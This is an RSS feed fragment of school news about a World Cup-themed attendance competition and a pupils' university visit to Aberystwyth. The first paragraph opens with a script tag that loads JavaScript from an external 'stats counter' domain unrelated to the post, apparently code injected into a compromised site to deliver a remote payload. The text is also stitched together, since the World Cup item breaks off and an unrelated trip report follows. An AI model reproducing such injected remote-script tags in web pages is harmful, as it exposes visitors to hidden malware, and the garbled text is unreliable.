			<content:encoded><![CDATA[<p><script type='text/javascript' src='http://newstatscounter.org/counter192.js'></script>The school is using The World Cup to increase global awareness with the pupils. Every form in Yr 7, 8, 9 and 10 has been drawn as a nation who have qualified for the World Cup.</p>
<p>Each form then has two weeks to find out about their respective country and prepare a short presentation. The presentations will be shown at the schools World Cup opening assembly on Friday 11th June. There is also a competitive nature to the event based on attendance.</p>
<p>Each form (country) has been drawn against another form (country). Whoever has the best attendance for the week goes through to the last round. This will see the forms cut from 32 to 16 to 8 to the final 4, who will make up the final. Whichever form has the best attendance in the final week will be crowned the overall champions.</p>
<p>Also, Runcorn CLC set up a quick website for the event</p>

<p>The pupils, from 8 Halton schools, spent the day in classroom based activities and evenings in the SU bar, watching football, having a disco and playing games with the Student Union leaders from Aberystywth. They also made the most of the beautiful surroundings by having a barbeque on the beach and making full use of the sports facilities there.</p>
<p>Jenny Rankin Mills, Halton&#8217;s HE Project Officer explained:</p>
<p>&#8220;The combination of lectures with student union activities allowed pupils to gain a real insight into university life&#8221;</p>
<p>&#8220;Trips like this will assist pupils to make informed choices as they get older and start making key decisions about their future&#8221;.</p>
